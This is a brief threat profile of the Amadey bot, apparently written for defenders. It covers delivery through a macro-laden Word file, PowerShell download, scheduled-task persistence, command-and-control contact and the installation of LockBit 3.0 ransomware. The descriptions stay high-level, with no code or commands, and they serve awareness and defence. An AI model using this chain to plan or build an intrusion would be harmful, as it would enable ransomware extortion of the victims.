First Known Appearance (Date)
2018
Delivery Method
Distributed via a Word File entitled “Sia_Sim.docx”, which contains a VBA macro. The macro must be initiated by the user, or can be initiated by an executable which is installed as part of an email attachment
Operating Methodology
- Once activated, a LNK file is installed and runs a series of Powershell commands to download and direct the Amadey Bot
- The Amadey bot copies itself into the Temp directory and registers with the task schedule, allowing it to run after a reboot.
- Once this is complete, it reaches out to the Command and Control server to establish communications and receive instructions
- In the latest version, the bot then downloads and installs Lockbit 3.0, as both Powershell and .exe forms
- Lockbit then infect the host system, changing the desktop to feature a ransom message to the user which threatens to release all of the compromised data to the Internet unless the payment is received
Other Notes
Lockbit 3.0 has become the most common tool for ransomware attacks since the last half of 2022
